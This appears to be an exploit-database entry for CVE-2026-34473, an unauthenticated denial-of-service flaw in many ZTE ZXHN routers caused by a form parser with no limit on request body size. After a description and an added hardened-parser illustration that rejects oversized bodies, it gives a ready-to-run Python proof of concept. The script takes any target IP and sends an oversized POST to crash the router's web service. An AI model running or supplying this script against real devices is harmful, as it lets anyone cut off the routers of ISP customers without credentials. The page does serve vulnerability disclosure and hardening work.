ZTE Routers - Unauthenticated Denial of Service



EKU-ID: 56452 CVE: CVE-2026-34473 OSVDB-ID:
Author: Mina Nageh Salalma Published: 2026-05-29 Verified: Not Verified


# Exploit Title: ZTE Routers - Unauthenticated Denial of Service
# Date: 2026-05-20
# Exploit Author: Mina Nageh Salalma (Monx Research)
# Vendor Homepage: https://www.zte.com.cn
# Software Link: https://github.com/minanagehsalalma/cve-2026-34473-unauthenticated-dos-zte-routers
# Version: Multiple ZTE router models (17+ confirmed)
# Tested on: Multiple ZTE ZXHN models; estimated 140,000+ publicly exposed devices
# CVE: CVE-2026-34473

# Description:
# The CGILua post.lua parser in 17+ ZTE router models does not enforce a
# maximum body size for application/x-www-form-urlencoded POST requests.
# An unauthenticated attacker can crash or freeze the router's web service
# by sending a single oversized POST request to any CGI endpoint.
# No authentication, session, or credentials are required.
#
# Affected: 17+ ZTE ZXHN router models deployed by ISPs worldwide.
# Estimated 140,000+ publicly reachable devices at time of research.
#
# MITRE CVE: https://www.cve.org/CVERecord?id=CVE-2026-34473
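# The defect described above is a missing upper bound on the request body.
# The following is an added illustration written for this page, not ZTE's
# post.lua nor code from the researcher's repository: it shows the
# unbounded read-then-parse shape beside a bounded parser that rejects on the
# declared Content-Length before reading anything and never reads past the
# limit even when the header is absent or understates the body. The 64 KiB
# limit, the function names and the handle_post dispatcher are assumptions
# chosen for the example.

```python
import io
from urllib.parse import parse_qs

# Assumed limit for this example; the advisory's point is that the real
# post.lua parser applies no limit at all.
MAX_FORM_BODY = 64 * 1024  # 64 KiB


class BodyTooLarge(Exception):
    """Request body exceeds MAX_FORM_BODY."""


def parse_form_unbounded(stream):
    """The vulnerable shape: read everything the client sends, then parse.
    Memory and parse time are chosen entirely by the client."""
    return parse_qs(stream.read().decode("latin-1"), keep_blank_values=True)


def parse_form_bounded(headers, stream, limit=MAX_FORM_BODY):
    """Hardened shape: refuse on the declared length before reading a byte,
    and never read past `limit` even when Content-Length is absent or lies."""
    declared = headers.get("content-length")
    if declared is None:
        want = limit + 1          # one extra byte reveals an overflowing body
    else:
        try:
            want = int(declared)
        except ValueError:
            raise ValueError("malformed Content-Length") from None
        if want < 0:
            raise ValueError("malformed Content-Length")
        if want > limit:
            raise BodyTooLarge(f"declared {want} bytes, limit {limit}")
    data = stream.read(want)  # bounded by `want`, so by `limit`
    if len(data) > limit:
        raise BodyTooLarge(f"received {len(data)} bytes, limit {limit}")
    return parse_qs(data.decode("latin-1"), keep_blank_values=True)


def handle_post(headers, stream, limit=MAX_FORM_BODY):
    """Minimal CGI-style dispatcher (assumed for the example): map parser
    outcomes to an HTTP status. Returns (status, parsed_fields)."""
    try:
        return 200, parse_form_bounded(headers, stream, limit)
    except BodyTooLarge:
        return 413, {}
    except ValueError:
        return 400, {}


if __name__ == "__main__":
    # Constructed request: the same 256 KiB body the PoC below sends.
    body = b"a=" + b"A" * (256 * 1024)
    status, _ = handle_post({"content-length": str(len(body))}, io.BytesIO(body))
    print("oversized POST ->", status)   # 413 with the bounded parser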

# PoC (Python 3)
import requests
import sys

def dos_exploit(target, size_kb=256):
    """
    CVE-2026-34473 - Unauthenticated DoS
    Sends an oversized application/x-www-form-urlencoded POST body to the
    ZTE CGILua web service. No credentials or session are needed.
    """
    url = f"http://{target}/cgi-bin/luci"
    # One form field whose value is size_kb KiB of filler; the parser reads
    # the whole body with no upper bound.
    payload = "a=" + "A" * (size_kb * 1024)
    headers = {"Content-Type": "application/x-www-form-urlencoded"}
    try:
        r = requests.post(url, data=payload, headers=headers, timeout=15)
        print(f"[+] {target} responded with HTTP {r.status_code} (device may still be up)")
    except requests.exceptions.ConnectionError:
        # Also raised if the port was closed or filtered before the request;
        # confirm the service was reachable beforehand to avoid a false positive.
        print(f"[!] {target} - Connection refused or dropped: device web service likely crashed (DoS successful)")
    except requests.exceptions.Timeout:
        print(f"[!] {target} - Timeout: device web service unresponsive (DoS successful)")
    except Exception as e:
        print(f"[-] {target}: {e}")

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: poc.py <target_ip> [payload_size_kb]")
        sys.exit(1)
    size = int(sys.argv[2]) if len(sys.argv) > 2 else 256
    dos_exploit(sys.argv[1], size)